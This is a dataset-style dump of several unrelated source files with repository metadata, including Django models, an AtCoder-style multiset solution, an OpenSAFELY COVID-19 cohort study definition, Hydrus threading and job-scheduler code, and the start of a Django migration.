        # Wait (up to 30 s) for the loading spinner to disappear.
        self.UTILS.waitForNotElements(DOM.Market.market_loading_icon,
                                      self.__class__.__name__ + " app - loading icon",
                                      True,
                                      30)
| [
"roy.collings@sogeti.com"
] | roy.collings@sogeti.com |
fe23f1d97649e353b053a3620c8b511e663df446 | b11e02c71b0076906cb67599ffef25bf4682d72a | /server/community/models.py | fc2c6c3093222bbfbfae359f5a677d4e71c9d91d | [] | no_license | kimth1113/SMB | e4a8d8ad7723c4e7752e3ba5c5bd35828d2b7443 | 5ebb9e458631348872a15524c15283933a7662b3 | refs/heads/master | 2023-08-17T04:19:45.389507 | 2021-10-05T17:01:26 | 2021-10-05T17:01:26 | 413,904,194 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | from django.db import models
from django.conf import settings
# Create your models here.
class Article(models.Model):
    """A community post written by a registered user."""
    # Author; article rows are removed when the user account is deleted.
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    # NOTE(review): denormalized copy of the author's name — can drift from
    # user.username; verify the views keep it in sync.
    username = models.TextField()
    title = models.CharField(max_length=200)
    content = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)      # refreshed on every save
class Comment(models.Model):
    """One comment attached to an Article."""
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    # Parent post; comments are removed with their article.
    article = models.ForeignKey(Article, on_delete=models.CASCADE)
    content = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)      # refreshed on every save
| [
"kimth1113@gmail.com"
] | kimth1113@gmail.com |
df9384d60dcde3fb318a9b646d98debfab15d79a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03578/s404612965.py | ac57b84158a4259a926ce398a0358c3c359d58d5 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 740 | py | # -*- coding: utf-8 -*-
import sys
from collections import deque, defaultdict
from math import sqrt, factorial
# def input(): return sys.stdin.readline()[:-1] # warning not \n
# def input(): return sys.stdin.buffer.readline().strip() # warning bytes
# def input(): return sys.stdin.buffer.readline().decode('utf-8')
def solve():
    """Read stock A and requests T from stdin; print YES if T is a sub-multiset of A."""
    int(input())  # n: size of A (the line must be consumed but the value is unused)
    stock = defaultdict(int)
    for value in (int(tok) for tok in input().split()):
        stock[value] += 1
    int(input())  # m: size of T (also unused beyond consuming the line)
    requests = [int(tok) for tok in input().split()]
    # Consume one matching stock item per request; fail on the first shortage.
    for value in requests:
        if not stock[value]:
            print("NO")
            return
        stock[value] -= 1
    print("YES")
# Single-test-case driver; switch to the commented line for multi-case judges.
t = 1
# t = int(input())
for case in range(1,t+1):
    ans = solve()
"""
1 + k
"""
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
62f20dcdc8cee3063b8ddfaabbbb4f14a6f03aad | a52f4e1a3f8961fe0bcb5728848d5b9b3e9b705f | /analysis/study_definition.py | b8ce30ffbdb771aa3afa9abf1fa3b5058a7daab6 | [
"MIT"
] | permissive | opensafely/SGTF-CFR-research | 0caaf68906172fa67d06686fedc6d5ad5b99e508 | 4163e86b22b9a7056476db57ab8f88d37a1f65a7 | refs/heads/master | 2023-08-23T10:48:08.243296 | 2021-11-16T12:23:46 | 2021-11-16T12:23:46 | 335,903,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,524 | py | # IMPORT STATEMENTS
# This imports the cohort extractor package. This can be downloaded via pip
from cohortextractor import (
StudyDefinition,
patients,
codelist_from_csv,
codelist,
combine_codelists,
filter_codes_by_category,
)
# dictionary of MSOA codes (for dummy data)
from dictionaries import dict_msoa
# IMPORT CODELIST DEFINITIONS FROM CODELIST.PY (WHICH PULLS THEM FROM
# CODELIST FOLDER
from codelists import *
# STUDY DEFINITION
# Defines both the study population and points to the important covariates and outcomes
study = StudyDefinition(
default_expectations={
"date": {"earliest": "1970-01-01", "latest": "today"},
"rate": "uniform",
"incidence": 0.2,
},
# STUDY POPULATION - registered 1 year prior to November 16th 2020
population=patients.satisfying(
"one_practice AND sgss_pos_inrange",
one_practice=patients.registered_with_one_practice_between(
"2019-11-16", "2020-11-16"
),
),
dereg_date=patients.date_deregistered_from_all_supported_practices(
on_or_after="2020-11-16", date_format="YYYY-MM",
),
# OUTCOMES - ONS death dates
died_ons_covid_flag_any=patients.with_these_codes_on_death_certificate(
covid_codelist,
on_or_after="2020-02-01",
match_only_underlying_cause=False,
return_expectations={"date": {"earliest": "2020-02-01"}, "incidence" : 0.5},
),
died_date_ons=patients.died_from_any_cause(
on_or_after="2020-02-01",
returning="date_of_death",
include_month=True,
include_day=True,
return_expectations={"date": {"earliest": "2020-08-01"}, "incidence" : 0.5},
),
### Primary care COVID cases
covid_tpp_probable=patients.with_these_clinical_events(
combine_codelists(covid_identification_in_primary_care_case_codes_clinical,
covid_identification_in_primary_care_case_codes_test,
covid_identification_in_primary_care_case_codes_seq),
return_first_date_in_period=True,
include_day=True,
return_expectations={"date": {"earliest": "2020-10-20"}, "incidence" : 0.2},
),
# Any COVID vaccination (first dose)
covid_vacc_date=patients.with_tpp_vaccination_record(
target_disease_matches="SARS-2 CORONAVIRUS",
on_or_after="2020-12-01", # check all december to date
find_first_match_in_period=True,
returning="date",
date_format="YYYY-MM-DD",
return_expectations={
"date": {
"earliest": "2020-12-08", # first vaccine administered on the 8/12
"latest": "2021-01-31",
},
"incidence":0.1
},
),
### COVID test positive (SGSS)
first_pos_test_sgss=patients.with_test_result_in_sgss(
pathogen="SARS-CoV-2",
test_result="positive",
find_first_match_in_period=True,
returning="date",
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest": "2020-06-01"},
"incidence": 0.4
},
),
### SGSS positive in study period
sgss_pos_inrange=patients.with_test_result_in_sgss(
pathogen="SARS-CoV-2",
test_result="positive",
find_first_match_in_period=True,
between=["2020-11-16", "2021-01-11"],
returning="date",
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest": "2020-11-16", "latest": "2021-01-11"},
"incidence": 0.9
},
),
sgtf=patients.with_test_result_in_sgss(
pathogen="SARS-CoV-2",
test_result="positive",
find_first_match_in_period=True,
between=["2020-11-16", "2021-01-11"],
returning="s_gene_target_failure",
return_expectations={
"rate": "universal",
"category": {"ratios": {"0": 0.4, "1": 0.4, "9": 0.1, "": 0.1}},
},
),
# SUS HOSPITAL ADMISSION
covid_admission_date=patients.admitted_to_hospital(
returning= "date_admitted",
with_these_diagnoses=covid_codelist,
on_or_after="sgss_pos_inrange",
find_first_match_in_period=True,
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest": "2020-11-16"}, "incidence" : 0.3},
),
covid_discharge_date=patients.admitted_to_hospital(
returning= "date_discharged",
with_these_diagnoses=covid_codelist,
on_or_after="sgss_pos_inrange",
find_first_match_in_period=True,
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest": "2020-11-16"}, "incidence" : 0.2},
),
# DAYS SPENT IN ICU
covid_icu_days=patients.admitted_to_hospital(
returning= "days_in_critical_care",
with_these_diagnoses=covid_codelist,
on_or_after="sgss_pos_inrange",
find_first_match_in_period=True,
return_expectations={
"category": {"ratios": {"10": 0.5, "20": 0.5}},
"incidence": 0.4,
},
),
# ICU ADMISSION
icu_admission_date=patients.admitted_to_icu(
on_or_after="sgss_pos_inrange",
find_first_match_in_period=True,
returning="date_admitted",
date_format="YYYY-MM-DD",
return_expectations={"date": {"earliest" : "2020-11-16"}, "incidence" : 0.2},
),
### DEMOGRAPHIC COVARIATES
# AGE
age=patients.age_as_of(
"sgss_pos_inrange",
return_expectations={
"rate": "universal",
"int": {"distribution": "population_ages"},
},
),
# SEX
sex=patients.sex(
return_expectations={
"rate": "universal",
"category": {"ratios": {"M": 0.49, "F": 0.51}},
}
),
# DEPRIVIATION
imd=patients.address_as_of(
"sgss_pos_inrange",
returning="index_of_multiple_deprivation",
round_to_nearest=100,
return_expectations={
"rate": "universal",
"category": {"ratios": {"100": 0.1, "200": 0.2, "300": 0.2, "400": 0.2, "500": 0.2, "600": 0.1}},
},
),
# GEOGRAPHIC REGION CALLED STP
stp=patients.registered_practice_as_of(
"sgss_pos_inrange",
returning="stp_code",
return_expectations={
"rate": "universal",
"category": {
"ratios": {
"STP1": 0.1,
"STP2": 0.1,
"STP3": 0.1,
"STP4": 0.1,
"STP5": 0.1,
"STP6": 0.1,
"STP7": 0.1,
"STP8": 0.1,
"STP9": 0.1,
"STP10": 0.1,
}
},
},
),
# GEOGRAPHIC REGION MSOA
msoa=patients.registered_practice_as_of(
"sgss_pos_inrange",
returning="msoa_code",
return_expectations={
"rate": "universal",
"category": {"ratios": dict_msoa},
},
),
# REGION - one of NHS England 9 regions
region=patients.registered_practice_as_of(
"sgss_pos_inrange",
returning="nuts1_region_name",
return_expectations={
"rate": "universal",
"category": {
"ratios": {
"North East": 0.1,
"North West": 0.1,
"Yorkshire and The Humber": 0.1,
"East Midlands": 0.1,
"West Midlands": 0.1,
"East of England": 0.1,
"London": 0.2,
"South East": 0.1,
"South West": 0.1,
},
},
},
),
# RURAL OR URBAN LOCATION
rural_urban=patients.address_as_of(
"sgss_pos_inrange",
returning="rural_urban_classification",
return_expectations={
"rate": "universal",
"category":
{"ratios": {
"1": 0.1,
"2": 0.1,
"3": 0.1,
"4": 0.1,
"5": 0.1,
"6": 0.1,
"7": 0.2,
"8": 0.2,
}
},
},
),
# HOUSEHOLD INFORMATION
household_id=patients.household_as_of(
"2020-02-01",
returning="pseudo_id",
return_expectations={
"int": {"distribution": "normal", "mean": 1000, "stddev": 200},
"incidence": 1,
},
),
household_size=patients.household_as_of(
"2020-02-01",
returning="household_size",
return_expectations={
"int": {"distribution": "normal", "mean": 3, "stddev": 1},
"incidence": 1,
},
),
care_home_type=patients.care_home_status_as_of(
"sgss_pos_inrange",
categorised_as={
"PC": """
IsPotentialCareHome
AND LocationDoesNotRequireNursing='Y'
AND LocationRequiresNursing='N'
""",
"PN": """
IsPotentialCareHome
AND LocationDoesNotRequireNursing='N'
AND LocationRequiresNursing='Y'
""",
"PS": "IsPotentialCareHome",
"U": "DEFAULT",
},
return_expectations={
"rate": "universal",
"category": {"ratios": {"PC": 0.05, "PN": 0.05, "PS": 0.05, "U": 0.85,},},
},
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/10
bmi=patients.most_recent_bmi(
between=["2010-02-01", "sgss_pos_inrange"],
minimum_age_at_measurement=16,
include_measurement_date=True,
include_month=True,
return_expectations={
"date": {},
"float": {"distribution": "normal", "mean": 35, "stddev": 10},
"incidence": 0.95,
},
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/6
smoking_status=patients.categorised_as(
{
"S": "most_recent_smoking_code = 'S'",
"E": """
most_recent_smoking_code = 'E' OR (
most_recent_smoking_code = 'N' AND ever_smoked
)
""",
"N": "most_recent_smoking_code = 'N' AND NOT ever_smoked",
"M": "DEFAULT",
},
return_expectations={
"category": {"ratios": {"S": 0.6, "E": 0.1, "N": 0.2, "M": 0.1}}
},
most_recent_smoking_code=patients.with_these_clinical_events(
clear_smoking_codes,
find_last_match_in_period=True,
on_or_before="sgss_pos_inrange",
returning="category",
),
ever_smoked=patients.with_these_clinical_events(
filter_codes_by_category(clear_smoking_codes, include=["S", "E"]),
on_or_before="sgss_pos_inrange",
),
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/27
ethnicity=patients.with_these_clinical_events(
ethnicity_codes,
returning="category",
find_last_match_in_period=True,
include_date_of_match=True,
return_expectations={
"category": {"ratios": {"1": 0.75, "2": 0.05, "3": 0.05, "4": 0.05, "5": 0.1}},
"incidence": 0.75,
},
),
ethnicity_16=patients.with_these_clinical_events(
ethnicity_codes_16,
returning="category",
find_last_match_in_period=True,
include_date_of_match=True,
return_expectations={
"category": {"ratios": {"1": 0.8, "5": 0.1, "3": 0.1}},
"incidence": 0.75,
},
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/21
chronic_respiratory_disease=patients.with_these_clinical_events(
chronic_respiratory_disease_codes,
return_first_date_in_period=True,
include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/55
asthma=patients.categorised_as(
{
"0": "DEFAULT",
"1": """
(
recent_asthma_code OR (
asthma_code_ever AND NOT
copd_code_ever
)
) AND (
prednisolone_last_year = 0 OR
prednisolone_last_year > 4
)
""",
"2": """
(
recent_asthma_code OR (
asthma_code_ever AND NOT
copd_code_ever
)
) AND
prednisolone_last_year > 0 AND
prednisolone_last_year < 5
""",
},
return_expectations={"category": {"ratios": {"0": 0.8, "1": 0.1, "2": 0.1}},},
recent_asthma_code=patients.with_these_clinical_events(
asthma_codes, between=["2017-02-01", "2020-11-16"],
),
asthma_code_ever=patients.with_these_clinical_events(asthma_codes),
copd_code_ever=patients.with_these_clinical_events(
chronic_respiratory_disease_codes
),
prednisolone_last_year=patients.with_these_medications(
pred_codes,
between=["2019-11-16", "2020-11-16"],
returning="number_of_matches_in_period",
),
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/7
chronic_cardiac_disease=patients.with_these_clinical_events(
chronic_cardiac_disease_codes,
return_first_date_in_period=True,
include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/30
diabetes=patients.with_these_clinical_events(
diabetes_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/32
lung_cancer=patients.with_these_clinical_events(
lung_cancer_codes, return_first_date_in_period=True, include_month=True,
),
haem_cancer=patients.with_these_clinical_events(
haem_cancer_codes, return_first_date_in_period=True, include_month=True,
),
other_cancer=patients.with_these_clinical_events(
other_cancer_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/12
chronic_liver_disease=patients.with_these_clinical_events(
chronic_liver_disease_codes,
return_first_date_in_period=True,
include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/14
other_neuro=patients.with_these_clinical_events(
other_neuro, return_first_date_in_period=True, include_month=True,
),
stroke=patients.with_these_clinical_events(
stroke, return_first_date_in_period=True, include_month=True,
),
dementia=patients.with_these_clinical_events(
dementia, return_first_date_in_period=True, include_month=True,
),
# Chronic kidney disease
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/17
creatinine=patients.with_these_clinical_events(
creatinine_codes,
find_last_match_in_period=True,
on_or_before="2020-11-16",
returning="numeric_value",
include_date_of_match=True,
include_month=True,
return_expectations={
"float": {"distribution": "normal", "mean": 60.0, "stddev": 15},
"date": {"earliest": "2019-02-28", "latest": "2020-11-16"},
"incidence": 0.95,
},
),
dialysis=patients.with_these_clinical_events(
dialysis_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/31
organ_transplant=patients.with_these_clinical_events(
organ_transplant_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/13
dysplenia=patients.with_these_clinical_events(
spleen_codes, return_first_date_in_period=True, include_month=True,
),
sickle_cell=patients.with_these_clinical_events(
sickle_cell_codes, return_first_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/36
aplastic_anaemia=patients.with_these_clinical_events(
aplastic_codes, return_last_date_in_period=True, include_month=True,
),
hiv=patients.with_these_clinical_events(
hiv_codes,
returning="category",
find_first_match_in_period=True,
include_date_of_match=True,
include_month=True,
return_expectations={
"category": {"ratios": {"43C3.": 0.8, "XaFuL": 0.2}},
},
),
permanent_immunodeficiency=patients.with_these_clinical_events(
permanent_immune_codes, return_first_date_in_period=True, include_month=True,
),
temporary_immunodeficiency=patients.with_these_clinical_events(
temp_immune_codes, return_last_date_in_period=True, include_month=True,
),
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/23
# immunosuppressant_med=
# hypertension
hypertension=patients.with_these_clinical_events(
hypertension_codes, return_first_date_in_period=True, include_month=True,
),
# Blood pressure
# https://github.com/ebmdatalab/tpp-sql-notebook/issues/35
bp_sys=patients.mean_recorded_value(
systolic_blood_pressure_codes,
on_most_recent_day_of_measurement=True,
on_or_before="2020-11-16",
include_measurement_date=True,
include_month=True,
return_expectations={
"float": {"distribution": "normal", "mean": 80, "stddev": 10},
"date": {"latest": "2020-11-16"},
"incidence": 0.95,
},
),
bp_dias=patients.mean_recorded_value(
diastolic_blood_pressure_codes,
on_most_recent_day_of_measurement=True,
on_or_before="2020-11-16",
include_measurement_date=True,
include_month=True,
return_expectations={
"float": {"distribution": "normal", "mean": 120, "stddev": 10},
"date": {"latest": "2020-11-16"},
"incidence": 0.95,
},
),
hba1c_mmol_per_mol=patients.with_these_clinical_events(
hba1c_new_codes,
find_last_match_in_period=True,
on_or_before="2020-11-16",
returning="numeric_value",
include_date_of_match=True,
include_month=True,
return_expectations={
"date": {"latest": "2020-11-16"},
"float": {"distribution": "normal", "mean": 40.0, "stddev": 20},
"incidence": 0.95,
},
),
hba1c_percentage=patients.with_these_clinical_events(
hba1c_old_codes,
find_last_match_in_period=True,
on_or_before="2020-11-16",
returning="numeric_value",
include_date_of_match=True,
include_month=True,
return_expectations={
"date": {"latest": "2020-11-16"},
"float": {"distribution": "normal", "mean": 5, "stddev": 2},
"incidence": 0.95,
},
),
# # https://github.com/ebmdatalab/tpp-sql-notebook/issues/49
ra_sle_psoriasis=patients.with_these_clinical_events(
ra_sle_psoriasis_codes, return_first_date_in_period=True, include_month=True,
),
) | [
"73470020+dgrint@users.noreply.github.com"
] | 73470020+dgrint@users.noreply.github.com |
2bc39bcc1beee6e7c11228aeb0f44298cf6663e7 | 50fb142226d75ed4a9d991555b9ee266f02260e5 | /include/HydrusThreading.py | bb9db952a7e15cd4f0b5f668c9b9a4383f881b68 | [
"WTFPL"
] | permissive | codelizard42/hydrus | 85a4ee0f90f96de01e2fcc0336d8bc57dcf418fe | 4bb6c317040819c87bf6085f74620441587ef2d1 | refs/heads/master | 2020-04-05T22:48:40.514900 | 2018-12-12T22:15:46 | 2018-12-12T22:15:46 | 30,299,239 | 1 | 0 | null | 2015-02-04T13:09:35 | 2015-02-04T13:09:34 | null | UTF-8 | Python | false | false | 17,836 | py | import bisect
import collections
import HydrusExceptions
import Queue
import random
import threading
import time
import traceback
import HydrusData
import HydrusGlobals as HG
import os
NEXT_THREAD_CLEAROUT = 0
THREADS_TO_THREAD_INFO = {}
THREAD_INFO_LOCK = threading.Lock()
def ClearOutDeadThreads():
with THREAD_INFO_LOCK:
all_threads = list( THREADS_TO_THREAD_INFO.keys() )
for thread in all_threads:
if not thread.is_alive():
del THREADS_TO_THREAD_INFO[ thread ]
def GetThreadInfo( thread = None ):
global NEXT_THREAD_CLEAROUT
if HydrusData.TimeHasPassed( NEXT_THREAD_CLEAROUT ):
ClearOutDeadThreads()
NEXT_THREAD_CLEAROUT = HydrusData.GetNow() + 600
if thread is None:
thread = threading.current_thread()
with THREAD_INFO_LOCK:
if thread not in THREADS_TO_THREAD_INFO:
thread_info = {}
thread_info[ 'shutting_down' ] = False
THREADS_TO_THREAD_INFO[ thread ] = thread_info
return THREADS_TO_THREAD_INFO[ thread ]
def IsThreadShuttingDown():
me = threading.current_thread()
if isinstance( me, DAEMON ):
if HG.view_shutdown:
return True
else:
if HG.model_shutdown:
return True
thread_info = GetThreadInfo()
return thread_info[ 'shutting_down' ]
def ShutdownThread( thread ):
thread_info = GetThreadInfo( thread )
thread_info[ 'shutting_down' ] = True
class DAEMON( threading.Thread ):
def __init__( self, controller, name ):
threading.Thread.__init__( self, name = name )
self._controller = controller
self._name = name
self._event = threading.Event()
self._controller.sub( self, 'wake', 'wake_daemons' )
self._controller.sub( self, 'shutdown', 'shutdown' )
def _DoPreCall( self ):
if HG.daemon_report_mode:
HydrusData.ShowText( self._name + ' doing a job.' )
def GetCurrentJobSummary( self ):
return 'unknown job'
def GetName( self ):
return self._name
def shutdown( self ):
ShutdownThread( self )
self.wake()
def wake( self ):
self._event.set()
class DAEMONWorker( DAEMON ):
def __init__( self, controller, name, callable, topics = None, period = 3600, init_wait = 3, pre_call_wait = 0 ):
if topics is None:
topics = []
DAEMON.__init__( self, controller, name )
self._callable = callable
self._topics = topics
self._period = period
self._init_wait = init_wait
self._pre_call_wait = pre_call_wait
for topic in topics:
self._controller.sub( self, 'set', topic )
self.start()
def _CanStart( self, time_started_waiting ):
return self._PreCallWaitIsDone( time_started_waiting ) and self._ControllerIsOKWithIt()
def _ControllerIsOKWithIt( self ):
return True
def _PreCallWaitIsDone( self, time_started_waiting ):
# just shave a bit off so things that don't have any wait won't somehow have to wait a single accidentaly cycle
time_to_start = ( float( time_started_waiting ) - 0.1 ) + self._pre_call_wait
return HydrusData.TimeHasPassed( time_to_start )
def GetCurrentJobSummary( self ):
return self._callable
def run( self ):
self._event.wait( self._init_wait )
while True:
if IsThreadShuttingDown():
return
time_started_waiting = HydrusData.GetNow()
while not self._CanStart( time_started_waiting ):
time.sleep( 1 )
if IsThreadShuttingDown():
return
self._DoPreCall()
try:
self._callable( self._controller )
except HydrusExceptions.ShutdownException:
return
except Exception as e:
HydrusData.ShowText( 'Daemon ' + self._name + ' encountered an exception:' )
HydrusData.ShowException( e )
if IsThreadShuttingDown(): return
self._event.wait( self._period )
self._event.clear()
def set( self, *args, **kwargs ): self._event.set()
# Big stuff like DB maintenance that we don't want to run while other important stuff is going on, like user interaction or vidya on another process
class DAEMONBackgroundWorker( DAEMONWorker ):
def _ControllerIsOKWithIt( self ):
return self._controller.GoodTimeToDoBackgroundWork()
# Big stuff that we want to run when the user sees, but not at the expense of something else, like laggy session load
class DAEMONForegroundWorker( DAEMONWorker ):
def _ControllerIsOKWithIt( self ):
return self._controller.GoodTimeToDoForegroundWork()
class THREADCallToThread( DAEMON ):
def __init__( self, controller, name ):
DAEMON.__init__( self, controller, name )
self._callable = None
self._queue = Queue.Queue()
self._currently_working = True # start off true so new threads aren't used twice by two quick successive calls
def CurrentlyWorking( self ):
return self._currently_working
def GetCurrentJobSummary( self ):
return self._callable
def put( self, callable, *args, **kwargs ):
self._currently_working = True
self._queue.put( ( callable, args, kwargs ) )
self._event.set()
def run( self ):
while True:
try:
while self._queue.empty():
if IsThreadShuttingDown():
return
self._event.wait( 1200 )
self._event.clear()
self._DoPreCall()
( callable, args, kwargs ) = self._queue.get()
self._callable = ( callable, args, kwargs )
callable( *args, **kwargs )
self._callable = None
del callable
except HydrusExceptions.ShutdownException:
return
except Exception as e:
HydrusData.Print( traceback.format_exc() )
HydrusData.ShowException( e )
finally:
self._currently_working = False
time.sleep( 0.00001 )
class JobScheduler( threading.Thread ):
def __init__( self, controller ):
threading.Thread.__init__( self, name = 'Job Scheduler' )
self._controller = controller
self._waiting = []
self._waiting_lock = threading.Lock()
self._new_job_arrived = threading.Event()
self._current_job = None
self._cancel_filter_needed = threading.Event()
self._sort_needed = threading.Event()
self._controller.sub( self, 'shutdown', 'shutdown' )
def _FilterCancelled( self ):
with self._waiting_lock:
self._waiting = [ job for job in self._waiting if not job.IsCancelled() ]
def _GetLoopWaitTime( self ):
with self._waiting_lock:
if len( self._waiting ) == 0:
return 0.2
next_job = self._waiting[0]
time_delta_until_due = next_job.GetTimeDeltaUntilDue()
return min( 1.0, time_delta_until_due )
def _NoWorkToStart( self ):
with self._waiting_lock:
if len( self._waiting ) == 0:
return True
next_job = self._waiting[0]
if next_job.IsDue():
return False
else:
return True
def _SortWaiting( self ):
# sort the waiting jobs in ascending order of expected work time
with self._waiting_lock: # this uses __lt__ to sort
self._waiting.sort()
def _StartWork( self ):
jobs_started = 0
while True:
with self._waiting_lock:
if len( self._waiting ) == 0:
break
if jobs_started >= 10: # try to avoid spikes
break
next_job = self._waiting[0]
if next_job.IsDue():
next_job = self._waiting.pop( 0 )
next_job.StartWork()
jobs_started += 1
else:
break # all the rest in the queue are not due
def AddJob( self, job ):
with self._waiting_lock:
bisect.insort( self._waiting, job )
self._new_job_arrived.set()
def ClearOutDead( self ):
with self._waiting_lock:
self._waiting = [ job for job in self._waiting if not job.IsDead() ]
def GetName( self ):
return 'Job Scheduler'
def GetCurrentJobSummary( self ):
with self._waiting_lock:
return HydrusData.ToHumanInt( len( self._waiting ) ) + ' jobs'
def GetPrettyJobSummary( self ):
with self._waiting_lock:
num_jobs = len( self._waiting )
job_lines = [ repr( job ) for job in self._waiting ]
lines = [ HydrusData.ToHumanInt( num_jobs ) + ' jobs:' ] + job_lines
text = os.linesep.join( lines )
return text
def JobCancelled( self ):
self._cancel_filter_needed.set()
def shutdown( self ):
ShutdownThread( self )
def WorkTimesHaveChanged( self ):
self._sort_needed.set()
def run( self ):
while True:
try:
while self._NoWorkToStart():
if IsThreadShuttingDown():
return
#
if self._cancel_filter_needed.is_set():
self._FilterCancelled()
self._cancel_filter_needed.clear()
if self._sort_needed.is_set():
self._SortWaiting()
self._sort_needed.clear()
continue # if some work is now due, let's do it!
#
wait_time = self._GetLoopWaitTime()
self._new_job_arrived.wait( wait_time )
self._new_job_arrived.clear()
self._StartWork()
except HydrusExceptions.ShutdownException:
return
except Exception as e:
HydrusData.Print( traceback.format_exc() )
HydrusData.ShowException( e )
time.sleep( 0.00001 )
class SchedulableJob( object ):
def __init__( self, controller, scheduler, initial_delay, work_callable ):
self._controller = controller
self._scheduler = scheduler
self._work_callable = work_callable
self._next_work_time = HydrusData.GetNowFloat() + initial_delay
self._work_lock = threading.Lock()
self._currently_working = threading.Event()
self._is_cancelled = threading.Event()
def __lt__( self, other ): # for the scheduler to do bisect.insort noice
return self._next_work_time < other._next_work_time
def __repr__( self ):
return repr( self.__class__ ) + ': ' + repr( self._work_callable ) + ' next in ' + HydrusData.TimeDeltaToPrettyTimeDelta( self._next_work_time - HydrusData.GetNowFloat() )
def _BootWorker( self ):
self._controller.CallToThread( self.Work )
def Cancel( self ):
self._is_cancelled.set()
self._scheduler.JobCancelled()
def CurrentlyWorking( self ):
return self._currently_working.is_set()
def GetTimeDeltaUntilDue( self ):
return HydrusData.GetTimeDeltaUntilTimeFloat( self._next_work_time )
def IsCancelled( self ):
return self._is_cancelled.is_set()
def IsDead( self ):
return False
def IsDue( self ):
return HydrusData.TimeHasPassedFloat( self._next_work_time )
def StartWork( self ):
if self._is_cancelled.is_set():
return
self._currently_working.set()
self._BootWorker()
def Wake( self, next_work_time = None ):
if next_work_time is None:
next_work_time = HydrusData.GetNowFloat()
self._next_work_time = next_work_time
self._scheduler.WorkTimesHaveChanged()
def Work( self ):
try:
with self._work_lock:
self._work_callable()
finally:
self._currently_working.clear()
class RepeatingJob( SchedulableJob ):
def __init__( self, controller, scheduler, initial_delay, period, work_callable ):
SchedulableJob.__init__( self, controller, scheduler, initial_delay, work_callable )
self._period = period
self._stop_repeating = threading.Event()
def Cancel( self ):
SchedulableJob.Cancel( self )
self._stop_repeating.set()
def Delay( self, delay ):
self._next_work_time = HydrusData.GetNowFloat() + delay
self._scheduler.WorkTimesHaveChanged()
def IsFinishedWorking( self ):
return self._stop_repeating.is_set()
def SetPeriod( self, period ):
if period > 10.0:
period += random.random() # smooth out future spikes if ten of these all fire at the same time
self._period = period
def StartWork( self ):
if self._stop_repeating.is_set():
return
SchedulableJob.StartWork( self )
def Work( self ):
SchedulableJob.Work( self )
if not self._stop_repeating.is_set():
self._next_work_time = HydrusData.GetNowFloat() + self._period
self._scheduler.AddJob( self )
| [
"hydrus.admin@gmail.com"
] | hydrus.admin@gmail.com |
6d2f69de2487fa86a348999f7695b0190ce4b725 | 78d7d7aeb78a8cea6d0e10b89fc4aa6c46c95227 | /3995.py | a3eefaf7f66a32547cbdcc5db18db51791b52a02 | [] | no_license | GenryEden/kpolyakovName | 97db13ef93061a8c2afc6cc5acd91337f79063f1 | c5d7f631ae7ec8770e56170574b82ea2b7d8a4d9 | refs/heads/master | 2023-05-23T21:22:51.983756 | 2021-06-21T08:56:49 | 2021-06-21T08:56:49 | 350,466,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | def check(x):
if sum([int(s) for s in oct(x)[2:]]) % 19 != 0:
return False
m = 1
for s in oct(x)[2:]:
m *= int(s)
return m % 5 == 0
cnt = 0
minimal = 0
for x in range(12345, 67890+1):
if check(x):
cnt += 1
if cnt == 1:
minimal = x
print(cnt, minimal) | [
"a926788@gmail.com"
] | a926788@gmail.com |
a81de31ca3b7bff30edbf232df80154a71a6a675 | ce36305a43aad1ed7df25e73d7b90a811c257f29 | /dashboard/migrations/0005_major.py | c77b73080582844b38d317916cbf0c0235373e03 | [] | no_license | EngHell/pm2-practica3 | 10f6623a73c3e284da85024f05ad6c86e7393644 | 2dbe08a27a56616c7f15aac9eaac2deb3a8cd489 | refs/heads/master | 2023-04-21T05:59:56.909702 | 2021-05-12T10:53:54 | 2021-05-12T10:53:54 | 364,018,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 813 | py | # Generated by Django 3.1.7 on 2021-03-18 20:19
from django.db import migrations, models
def seed_database(apps, schema_editor):
Major = apps.get_model('dashboard', 'Major')
Major(code='M01', name='Matematica').save()
Major(code='F01', name='Fisica').save()
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0004_auto_20210318_0708'),
]
operations = [
migrations.CreateModel(
name='Major',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
